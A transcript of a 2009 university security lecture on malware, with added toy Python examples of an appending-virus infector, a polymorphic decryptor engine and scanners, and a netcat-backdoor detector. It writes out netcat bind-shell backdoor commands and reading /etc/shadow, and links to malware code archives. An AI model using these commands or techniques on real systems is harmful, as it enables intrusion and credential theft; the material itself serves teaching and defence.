CS423523 - PowerPoint PPT Presentation
Provided by: CarolT155. Slides: 49

Transcript and Presenter's Notes
1
CSCD 434 Spring 2009
Lecture 11: Attacks: Worms, Viruses, Trojans,
Backdoors
2
Introduction
  • Today, cover malware
  • Viruses, Worms, Spyware and Trojan Horses/
    Backdoors
  • Not the entire picture of things that can infect
    you
  • Still missing rootkits ... let you learn these on
    your own
  • Nearly all of these infect computers via the
    network
  • Email counts as a form of remote infection
  • Damage from these is enormous
  • If you do decide to write one for fun, don't
    release it; you could wind up in jail

3
Definitions
  • Worm
  • Replicates itself; a stand-alone program that spreads
    via the network
  • Virus
  • Program that attaches itself to another program
  • Replicates itself when the host program is run
  • Trojan horse
  • Program that pretends to do one thing but does
    something else behind the scenes
  • Botnet
  • A collection of programs running autonomously on
    victim machines and controlled remotely
  • Used to spread worms, send spam, mount DDoS attacks

4
Virus Question
  • Where did the idea of computer virus originate?

5
What is a computer virus?
  • It was in a work of fiction!

6
Virus Stats
  • 1988 Less than 10 known viruses
  • 1990 New virus found every day
  • 1993 10-30 new viruses per week
  • 1999 45,000 viruses and variants
  • Source: McAfee

7
F-Secure Graph
8
Other Code Statistics
  • Spyware figures
  • Huge problem and growing larger
  • EarthLink's SpyAudit program scanned over
    1,062,756 PCs
  • Found 29.5 million instances of spyware
  • About 28 per computer

9
Viruses
  • Biology is like Technology (sort of ...)
  • A biological virus is not alive
  • DNA fragment inside a protective jacket
  • Unlike a cell, a virus has no way to reproduce by
    itself -- it is not alive
  • Instead, biological virus must inject its DNA
    into cells
  • Viral DNA then uses cell's existing machinery to
    reproduce itself
  • Some cases, cell fills with new viral particles
    until it bursts, releasing the virus but killing
    the cell
  • Other cases, new virus particles bud off the cell
    one at a time, and the cell remains alive

10
Viruses
  • Viral DNA
  • A computer virus shares some of these traits.
  • A computer virus must piggyback on top of some
    other program or document in order to get
    executed
  • Once it is running, it is then able to infect
    other programs or documents
  • Goal is not to get detected if possible

11
Virus Infection
  • Three parts
  • Infection mechanism: how it spreads
  • Trigger: decides whether to deliver the payload
  • Payload: what the virus does besides spread
  • May involve damage or not
  • Pseudocode:
      def virus():
          infect()
          if trigger():
              payload()

12
Virus Targets
  • Boot Sector
  • Not too common anymore
  • Infects by copying itself to the boot block
  • Each time the system is booted, the virus loads
  • Few systems boot from floppy anymore
  • OSs prevent writing to the disk's boot sector
  • BIOSes have boot-block protection

13
File Infectors
  • Infects executable files
  • Often becomes memory resident when infected file
    is run
  • Binary executables are the most common
  • Question is then how is the virus executed when
    the file is run?

14
File Infectors
  • At the beginning - prepending
  • Simple executables - .COM files
  • Entire file loaded into memory, virus code is
    placed at the beginning of the file
  • Then the file is run and virus gets executed
    first
  • At the end of the file - appending
  • Appended to end of file
  • File header specifies start of code
  • Change start location to first run virus code,
    then run executable file

15
Prepending File Virus
Figure: before infection, the .COM file starts with its own code.
After infection, the virus code (infect(); if trigger(): payload())
sits at the start of the file and the original .COM file follows it,
so the virus runs first.
16
Appending File Virus
Figure: before infection, the .EXE header's start field points at the
program's code. After infection, the virus code (infect(); if
trigger(): payload()) is appended at the end of the file, the header's
start field points at it, and the old start is where control returns.
17
Appending Virus.. more
  • How to infect a file (appending):
    1. Open the un-infected file
    2. Get the start-of-code offset from the header
    3. Calculate the offset to the end of the file; save
       the original start-of-code offset; overwrite the
       start-of-code offset in the file with the
       calculated end-of-file offset
    4. Append the viral code to the end of the file
    5. Add a jump instruction (jmp) back to the original
       offset

Figure, before:  Header | text | code offset | File Code
Figure, after:   Header | text | viral offset | File Code |
                 Viral Code | jmp code offset
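The five steps above carried out end to end, as an added example that is not part of the lecture. It works on a made-up "TOY" executable format (a 7-byte header holding an entry offset and a code length, followed by code for a three-instruction toy machine) so that nothing here touches a real .COM or .EXE file; the format, the instruction set and the function names are all invented for the demonstration. It also includes the check a scanner would run on the result: after infection the header's entry offset points past the declared code region, which is the tell-tale of an appended virus (together with the size increase the lecture later lists among the symptoms).

```python
# Added example for this lecture (not code from the slides): the five appending
# steps on a made-up executable format, plus the check that catches the result.
# The "TOY" header, its fields and the tiny instruction set are all invented;
# nothing here touches a real .EXE/.COM file.
HDR_LEN = 7                                   # b"TOY" | entry offset (2 bytes) | code length (2 bytes)
OP_HALT, OP_PRINT, OP_JMP = 0x00, 0x10, 0x20  # PRINT c emits one char; JMP addr is absolute

def build_program(code):
    """Assemble a clean TOY file whose entry point is the first code byte."""
    return b"TOY" + HDR_LEN.to_bytes(2, "big") + len(code).to_bytes(2, "big") + code

def parse_header(blob):
    """Return (entry offset, declared code length) from the TOY header."""
    if blob[:3] != b"TOY":
        raise ValueError("not a TOY file")
    return int.from_bytes(blob[3:5], "big"), int.from_bytes(blob[5:7], "big")

def execute(blob, max_steps=1000):
    """Run the file from its header's entry offset; return what it printed."""
    pc, _ = parse_header(blob)
    out = []
    for _ in range(max_steps):
        op = blob[pc]
        if op == OP_HALT:
            return "".join(out)
        if op == OP_PRINT:
            out.append(chr(blob[pc + 1]))
            pc += 2
        elif op == OP_JMP:
            pc = int.from_bytes(blob[pc + 1:pc + 3], "big")
        else:
            raise ValueError(f"bad opcode {op:#x} at offset {pc}")
    raise RuntimeError("no HALT reached")

# Stand-in for infect(); if trigger(): payload() -- it only prints "V".
VIRAL_CODE = bytes([OP_PRINT, ord("V")])

def append_infect(blob):
    """Steps 1-5 from the slide, on an in-memory TOY file (step 1 is the caller reading it)."""
    original_entry, _code_len = parse_header(blob)             # 2. read and save the start-of-code offset
    eof = len(blob)                                             # 3. offset of the end of the file ...
    patched = blob[:3] + eof.to_bytes(2, "big") + blob[5:]      #    ... written over the start offset
    patched += VIRAL_CODE                                       # 4. append the viral code
    patched += bytes([OP_JMP]) + original_entry.to_bytes(2, "big")  # 5. jmp back to the original entry
    return patched

def entry_outside_code(blob):
    """Scanner heuristic: a clean file starts executing inside its declared code
    region; an appending virus moves the entry point past the end of it."""
    entry, code_len = parse_header(blob)
    return not (HDR_LEN <= entry < HDR_LEN + code_len)

if __name__ == "__main__":
    clean = build_program(bytes([OP_PRINT, ord("H"), OP_PRINT, ord("i"), OP_HALT]))
    infected = append_infect(clean)
    print(execute(clean), execute(infected))                        # Hi VHi
    print(entry_outside_code(clean), entry_outside_code(infected))  # False True
```

The infected file still behaves like the original from the user's point of view (it prints "Hi" after the virus has run), which is exactly why the file-size and entry-point checks matter more than watching for visible misbehaviour. The same heuristic carries over to real formats: an entry point that falls outside the image's declared code section is a classic indicator that something was appended.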
18
Data File Infections
  • Macro Virus
  • Word docs allow small pieces of code, macros to
    be embedded in data file
  • When data file is loaded, macros can be
    automatically run
  • Word has global set of macros, easily infected by
    single document
  • After infection, every document edited is
    infected by viral macros
  • What's the most famous Macro Virus?

19
Melissa Macro Virus
  • Word macro virus delivered through e-mail in an
    attached Word document
  • The e-mail message may contain the subject line
    "Important Message From <UserName>" and the message
    body "Here is that document you asked for ... don't
    show anyone else ;-)"
  • Can propagate itself by sending e-mail with the
    infected document to a number of recipients
  • Key: the virus reads the list of members from each
    Outlook Address Book and sends an e-mail message to
    the first 50 recipients; the user clicks on the
    document to become infected

20
Symptoms of Viruses
  • Your computer displays a vulgar, embarrassing or
    annoying message
  • Your computer develops unusual visual or sound
    effects
  • You have difficulty saving files; files
    mysteriously disappear
  • Your computer reboots suddenly
  • Your computer works very slowly
  • Your executable files unaccountably increase in
    size
  • Your computer starts sending out lots of e-mail
    messages on its own

21
Virus Evasion Techniques
  • Viruses do a number of things to hide
  • Stealth viruses: hide changes in the system (and
    therefore the virus) by showing the original state
  • Oligomorphic viruses: encrypt the body and pick the
    decryptor routine from a small, fixed set of variants
  • Polymorphic viruses: varying encrypted body and an
    effectively unlimited number of decryptor variants
    (polymorphic decryptor)
  • Metamorphic viruses: use various code morphing
    techniques to create new instances that are
    different in code but identical in behaviour
  • Each will be described in following slides

22
Stealth Viruses
  • Conceals infection from discovery
  • Original timestamp can be restored
  • File doesn't appear to have changed
  • Preserves other information (size, timestamp,
    contents) and returns it when the file is queried
    via I/O
  • How?
  • I/O calls are intercepted, e.g. through shared
    libraries which are accessible to users
  • A lot like rootkits and what they do
  • Replace system binary files, like ls, ps for
    example

23
Encrypted Virus
  • The morphic virus hiding techniques use
    encryption
  • Virus body (trigger, payload) is encrypted
  • Harder to detect
  • Not traditional encryption with a secret key;
    more like code obfuscation
  • Virus is not runnable until decrypted
  • Decryption loop runs first; the idea is to fool
    virus scanners

24
Encrypted Virus
  • What's in a decryptor loop?
  • Simple methods
  • +, -, bitwise rotation, negation, logical NOT
  • Encryption      Decryption
    inc body        dec body
    rol body        ror body
    neg body        neg body
    body + 123      body - 123
  • Variable key:
      for i in 0 ... len(body):
          body[i] = body[i] XOR key

25
Oligomorphic viruses
  • Problem
  • Only changes the decryptor loop, not the virus
    body
  • Small, finite number of decryptor loops
  • Some found had 30, others had 96
  • Not enough diversity for anti-virus programs
  • They can simply try all decryptor variants to
    identify the virus

26
Polymorphic viruses
  • Have an effectively unlimited number of decryptor
    loops
  • Much harder to detect
  • Uses a mutation engine
  • Each instance of the virus is transformed
  • Substitute equivalent instructions, reorder
    instructions
  • e.g. clear r1  or  xor r1, r1
  • Change instructions, reorder data
  • e.g. x = 1  or  y = 21; x = y - 20
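The decryptor loop, the oligomorphic problem (a finite menu of decryptors the scanner can simply try) and the polymorphic mutation engine from the last four slides, modelled together as an added example that is not code from the lecture. The six-instruction "machine", the sample layout (key, instruction count, decryptor bytes, encrypted body), the SIGNATURE and BODY byte strings and all function names are invented here. It shows the encrypt/decrypt pairs from the table (inc/dec, rol/ror, +123/-123, XOR key), why the oligomorphic set falls to a scanner that knows every decryptor variant, and why the defence against polymorphism is to emulate the decryptor and match the plaintext rather than the bytes.

```python
# Added example for this lecture (not code from the slides): a toy model of an
# encrypted virus body, a small fixed menu of decryptors (oligomorphic), a
# mutation engine that rewrites a decryptor with equivalent instructions
# (polymorphic), and two scanners.  The instruction set, the sample layout and
# the byte strings are all invented for the demonstration.
import random

SIGNATURE = b"PAYLOAD"                      # constructed: pattern the scanner matches in plaintext
BODY = b"infect();if trigger():PAYLOAD()"   # constructed plaintext "virus body"

# A decryptor is a list of (op, arg) pairs applied, in order, to every body byte.
OPS = {"xor_key": 1, "add": 2, "sub": 3, "rol": 4, "ror": 5, "nop": 6}
INVERSE = {"xor_key": "xor_key", "add": "sub", "sub": "add",
           "rol": "ror", "ror": "rol", "nop": "nop"}

def run(instrs, data, key):
    """Emulate the decryptor loop: apply each instruction to each byte of data."""
    out = bytearray()
    for b in data:
        for op, arg in instrs:
            if op == "xor_key":
                b ^= key
            elif op == "add":
                b = (b + arg) & 0xFF
            elif op == "sub":
                b = (b - arg) & 0xFF
            elif op == "rol":
                b = ((b << arg) | (b >> (8 - arg))) & 0xFF
            elif op == "ror":
                b = ((b >> arg) | (b << (8 - arg))) & 0xFF
        out.append(b)
    return bytes(out)

def encryptor_for(decryptor):
    """The encryption loop is the decryptor run backwards with every op inverted."""
    return [(INVERSE[op], arg) for op, arg in reversed(decryptor)]

# Oligomorphic: a small, fixed menu of decryptor loops (the slide's table).
OLIGO_DECRYPTORS = [
    [("xor_key", 0)],   # body[i] ^= key
    [("sub", 123)],     # body[i] -= 123   (encrypt: += 123)
    [("ror", 3)],       # bitwise rotation (encrypt: rol)
    [("sub", 1)],       # dec body         (encrypt: inc body)
]

def mutate(decryptor, rng):
    """Polymorphic mutation engine: same effect, different bytes."""
    out = []
    for op, arg in decryptor:
        if op in ("sub", "add") and rng.random() < 0.5:
            op, arg = INVERSE[op], (256 - arg) & 0xFF      # sub n  ==  add (256 - n)
        elif op in ("ror", "rol") and rng.random() < 0.5:
            op, arg = INVERSE[op], 8 - arg                 # ror n  ==  rol (8 - n)
        if rng.random() < 0.5:
            c = rng.randrange(1, 256)
            out += [("add", c), ("sub", c)]                # junk pair that cancels out
        if rng.random() < 0.5:
            out.append(("nop", 0))                         # filler
        out.append((op, arg))
    return out

def serialize(decryptor):
    return b"".join(bytes([OPS[op], arg]) for op, arg in decryptor)

def deserialize(blob):
    names = {v: k for k, v in OPS.items()}
    return [(names[blob[i]], blob[i + 1]) for i in range(0, len(blob), 2)]

def build_sample(decryptor, key, body=BODY):
    """Constructed file layout: key | instruction count | decryptor bytes | encrypted body."""
    return bytes([key, len(decryptor)]) + serialize(decryptor) + run(encryptor_for(decryptor), body, key)

def split_sample(sample):
    key, n = sample[0], sample[1]
    return key, sample[2:2 + 2 * n], sample[2 + 2 * n:]

def polymorphic_sample(base, key, seed):
    """Mutate `base` until its bytes match none of the known decryptors."""
    rng, known = random.Random(seed), {serialize(d) for d in OLIGO_DECRYPTORS}
    dec = mutate(base, rng)
    while serialize(dec) in known:
        dec = mutate(base, rng)
    return build_sample(dec, key), dec

def signature_scan(sample):
    """Scanner 1 (enough against oligomorphic code): recognise one of the finitely
    many decryptor loops byte-for-byte, run it, then look for SIGNATURE."""
    key, blob, enc = split_sample(sample)
    for dec in OLIGO_DECRYPTORS:
        if blob == serialize(dec):
            return SIGNATURE in run(dec, enc, key)
    return False

def emulating_scan(sample):
    """Scanner 2: emulate whatever decryptor is present, then match the plaintext.
    Code morphing that preserves behaviour does not change the result."""
    key, blob, enc = split_sample(sample)
    return SIGNATURE in run(deserialize(blob), enc, key)

if __name__ == "__main__":
    s = build_sample(OLIGO_DECRYPTORS[1], 77)
    p, dec = polymorphic_sample(OLIGO_DECRYPTORS[1], 77, seed=3)
    print("oligomorphic:", signature_scan(s), emulating_scan(s))   # True True
    print("polymorphic :", signature_scan(p), emulating_scan(p))   # False True
    print("mutated decryptor:", dec)
```

Running the module prints True/True for the oligomorphic sample and False/True for the mutated one: the byte-level scanner no longer recognises the decryptor, the emulating scanner still finds the body once it has been decrypted. Metamorphic code (the next evasion class on the slide) defeats even that by morphing the body itself rather than just the decryptor, which is why the lecture lists it separately.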

27
Worms
28
Worms Spread?
  • Copy itself directly across the network
  • Read your address book
  • Emails itself to everyone in your address book
  • How easy is it to do this?
  • Microsoft Outlook: trivial
  • Can cause Outlook to send e-mails without the user's
    awareness
  • Reason why so many worms target Outlook

29
Worm Examples
  • Example I-Love-You
  • The e-mail worm arrived May 4, 2000, with the
    simple subject of "ILOVEYOU" and an attachment
  • LOVE-LETTER-FOR-YOU.TXT.vbs
  • Upon opening the attachment, the software sent a
    copy of itself to everyone in the user's address
    list, posing as the user.
  • Overwrites files with the following extensions: VBS,
    VBE, JS, JSE, CSS, WSH, SCT, HTA, JPG, JPEG, MP3,
    and MP2 ... overwritten files contain the worm's
    body and their extension is changed to .vbs

30
Worm Examples
  • Example SQL Slammer, January 2003
  • Although titled "SQL Slammer worm", the program
    didn't use the SQL language
  • It exploited a buffer overflow bug in Microsoft's
    SQL Server and Desktop Engine database products,
    for which a patch had been released six months
    earlier
  • Affected Microsoft SQL Server 2000
  • Vulnerable population: 75,000 machines infected
    in less than 10 minutes
  • http://en.wikipedia.org/wiki/SQL_slammer_worm

31
Worm Examples
  • Current example: Storm Worm, 2007
  • Storm Worm began infecting thousands of
    computers in Europe and the United States in
    January 2007
  • Used an e-mail message with a subject line about a
    recent weather disaster
  • "230 dead as storm batters Europe" (hence "Storm")
  • When the attachment is opened, it installs the
    wincom32 service and injects a payload, passing on
    packets to destinations encoded within the
    malware

32
Worm Examples
  • Example Storm Worm cont.
  • Compromised machine becomes merged into a botnet
  • While most botnets are controlled through a central
    server, which if found can be taken down,
  • Storm Worm seeds a botnet that acts in a similar
    way to a P2P network, with no centralized control

33
Malicious Code
  • Using Worms
  • Spammers are now hackers: hundreds of thousands of
    vulnerable computers are being used to launch
    spam campaigns
  • 70 percent of all spam is now sent this way,
    according to anti-spam firm Message Labs Inc.,
    and perhaps 6 to 7 billion spam messages are
    routed through hacked home computers

34
Malicious Code
  • Attack Trends
  • Crossbreeding
  • Combo Malware significantly raises the threat
    posed by these attacks by treating each element
    as a building block.
  • Malware developer of today constructs an attack
    tool by selecting various blocks and combining
    them in a single piece of code
  • For example, attackers are increasingly spreading
    backdoors using worm propagation techniques.
  • The Bugbear.b worm, which appeared in 2003
    featured several backdoors.
  • The more recent Blaster worm and Sobig.F virus
    also installed backdoors

35
Malicious Code
  • Attack Trends
  • Combo-malware tools are built to exhaust our
    system defenses (and defenders).
  • They are far more likely to find some hole in
    your defenses than single-trick malware
    specimens.
  • To fight combo malware, you need more than your
    signature-based AV engine loaded on servers and
    desktops
  • You need to think in terms of holistic defense,
    addressing multiple vulnerability points,
    hardening your overall network and preparing for
    the worst. (Ed Skoudis)

36
Attacks Maintaining Access
  • Just completed the Phase where you Gain Access to
    a system or systems
  • Gotten in through a vulnerability
  • Next phase Maintain Access
  • Install a remote control backdoor to victim
    system
  • Backdoor will allow attacker access in the future

37
Backdoors
  • What is a Backdoor?
  • Once you penetrate a machine through one of the
    ways we talked about previously
  • You want to install a future access point
  • A backdoor is a way into the system that allows
    the attacker admission whenever they want

38
Backdoors
  • Example
  • Netcat tool
  • Claim that netcat is one of the most popular
    backdoor tools in use today
  • Netcat when run on victim machine can be
    configured to listen on any TCP port
  • Executes any program to deal with traffic coming
    in on that port
  • Will have same permission as account from which
    netcat was executed
  • Can send it data and have it executed on victim
    machine
  • Assume attacker has gained access to a victim
    machine and wants to set up a command-shell
    backdoor

39
Backdoors
  • Linux Example
  • nc -l -p 12345 -e /bin/sh      (backdoor on
    victim_machine)
  • Runs the netcat program, which listens on TCP
    port 12345
  • and executes a shell, feeding it the data sent to
    port 12345
  • nc victim_machine 12345        (client on attacker
    machine)
  • cmd> ls   (will list contents of the directory
    on the victim machine)
  • sensitive_documents
  • tools
  • games
  • cmd> cat /etc/shadow   (only works if the user on
    the victim has root)

40
Backdoors
  • Example - Windows Machine
  • Can also use netcat on a Windows machine
  • Instead of /bin/sh, use cmd.exe
  • C:\> nc -l -p 12345 -e cmd.exe   (on victim
    machine)
  • Similar results!
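One way to hunt for the listener the last two slides describe, as an added example rather than code from the lecture: it correlates a process listing with the listening sockets and reports relay tools (nc, ncat, netcat, socat) that were started with an option handing each incoming connection to a program. PS_SAMPLE and SS_SAMPLE are constructed to look like `ps -eo pid,user,args --no-headers` and `ss -ltnp` output on Linux and were not captured from a real host; the function names and the regular expressions are mine. One caveat on the commands above: the OpenBSD netcat that many distributions install as `nc` has no `-e` at all, traditional netcat only has it when compiled with that option enabled, and Nmap's ncat offers `-e`/`-c`; so in practice the same backdoor may show up as ncat or socat, which is why the check covers those too.

```python
# Added example for this lecture (not code from the slides): find a netcat-style
# command-shell backdoor such as `nc -l -p 12345 -e /bin/sh` by correlating a
# process listing with the listening sockets.  PS_SAMPLE and SS_SAMPLE are
# constructed to look like `ps -eo pid,user,args --no-headers` and `ss -ltnp`
# output on Linux; they were not captured from a real host.
import re
import shlex

PS_SAMPLE = """\
  812 root     /usr/sbin/sshd -D
 1342 alice    nc -l -p 12345 -e /bin/sh
 1350 bob      ncat -lvp 4444 -e cmd.exe
 1377 alice    nc example.org 80
 1402 root     socat TCP-LISTEN:5555,fork EXEC:/bin/bash
 1410 alice    python3 -m http.server 8000
"""

SS_SAMPLE = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128          0.0.0.0:22        0.0.0.0:*     users:(("sshd",pid=812,fd=3))
LISTEN 0      1            0.0.0.0:12345     0.0.0.0:*     users:(("nc",pid=1342,fd=3))
LISTEN 0      10           0.0.0.0:4444      0.0.0.0:*     users:(("ncat",pid=1350,fd=4))
LISTEN 0      5            0.0.0.0:5555      0.0.0.0:*     users:(("socat",pid=1402,fd=5))
LISTEN 0      5            0.0.0.0:8000      0.0.0.0:*     users:(("python3",pid=1410,fd=3))
"""

# Tools that relay a socket to a program: nc/ncat do it with -e/-c, socat with
# an EXEC: or SYSTEM: address.
RELAY_TOOLS = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd", "socat"}
EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec"}
CLUSTERED_EXEC = re.compile(r"^-[A-Za-z]*[ec][A-Za-z]*$")   # e.g. "-le"; a heuristic
SOCAT_EXEC = re.compile(r"^(EXEC|SYSTEM):", re.I)

def hands_socket_to_program(argv):
    """True if the command line asks the relay tool to run a program on connect."""
    return any(a in EXEC_FLAGS or CLUSTERED_EXEC.match(a) or SOCAT_EXEC.match(a)
               for a in argv[1:])

def suspicious_processes(ps_text):
    """[(pid, user, argv)] for relay tools started with an exec option."""
    hits = []
    for line in ps_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, argv = int(parts[0]), parts[1], shlex.split(parts[2])
        tool = argv[0].rsplit("/", 1)[-1]
        if tool in RELAY_TOOLS and hands_socket_to_program(argv):
            hits.append((pid, user, argv))
    return hits

# local port, then the peer column, then the first owning process name and pid
SS_LINE = re.compile(r':(\d+)\s+\S+\s+users:\(\("([^"]+)",pid=(\d+)')

def listening_relays(ss_text):
    """{pid: port} for LISTEN sockets owned by a relay tool."""
    owners = {}
    for line in ss_text.splitlines()[1:]:          # skip the header row
        m = SS_LINE.search(line)
        if m and m.group(2) in RELAY_TOOLS:
            owners[int(m.group(3))] = int(m.group(1))
    return owners

def find_backdoors(ps_text, ss_text):
    """Relay tools that both listen on a port and exec a program: (pid, port, user, cmdline)."""
    ports = listening_relays(ss_text)
    return sorted((pid, ports[pid], user, " ".join(argv))
                  for pid, user, argv in suspicious_processes(ps_text) if pid in ports)

if __name__ == "__main__":
    for pid, port, user, cmd in find_backdoors(PS_SAMPLE, SS_SAMPLE):
        print(f"pid {pid} ({user}) listening on {port}: {cmd}")
```

On the sample data the outbound `nc example.org 80` and the Python web server are left alone; only the three listeners that exec a program are reported. The clustered-flag regex is a heuristic (any short-option cluster containing e or c counts as an exec option), so review its hits by hand, and remember that an attacker who renames the binary defeats the name check; the socket-to-process correlation is the part that still holds up.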

41
Backdoors and Trojans
  • Trojans Classic example
  • Replace /bin/login - lets users log in to system
    but saves passwords for later analysis
  • Trojan Backdoor
  • Combination of a backdoor hiding inside of a
    trojan program

42
Backdoors and Trojans
  • Trojan Backdoor
  • Grouped several ways based on their method of
    dissemination
  • Application Level
  • User mode Rootkit
  • Kernel Level Rootkit
  • Table 10.2 in Skoudis lists some examples

43
Backdoors and Trojans
  • Application Level Trojan Backdoor
  • Separate application runs on the system giving
    attacker backdoor access
  • Example programs
  • Back Orifice 2000 (BO2K)
  • Sub7
  • QAZ
  • VCN

44
Backdoors and Trojans
  • User Mode Rootkits
  • Critical operating system components are replaced
    or modified by the attacker to create backdoors
    and hide on the system
  • Example Programs
  • Linux RootKit 5 (lrk5)
  • T0rnKit for Linux, Solaris
  • Other platform specific Rootkits
  • SunOS, AIX, SCO, Solaris

45
Backdoors and Trojans
  • Kernel-level Root Kits
  • The operating system itself is modified to foster
    backdoor access and allow the attacker to hide
  • Example Programs
  • Knark for Linux
  • Adore for Linux
  • Plasmoid's Solaris Kernel-level Rootkit
  • Windows NT Rootkit

46
Backdoors and Trojans
  • Most popular consist of a small list
  • Sub7 - Windows: http://hackpr.net/sub7/main.shtml
  • Back Orifice 2000 - Windows: www.bo2k.com
  • VNC: both Unix/Windows
  • VNC can be found at
  • http://www.softpanorama.org/Xwindows/vnc.shtml

47
Summary
  • Malware Viruses, Worms and combinations
    including Trojan backdoor components are rampant
  • Continues to be a serious problem for everyone
    using the Internet
  • Not just teenagers looking to brag anymore
  • More and more the proliferation appears to be
    related to the business of spamming
  • Resources
  • http://vx.netlux.org/ good for code examples
  • http://www.offensivecomputing.net/ more examples

48
The End
Next Time Defense !!!
See Course Notes for Reading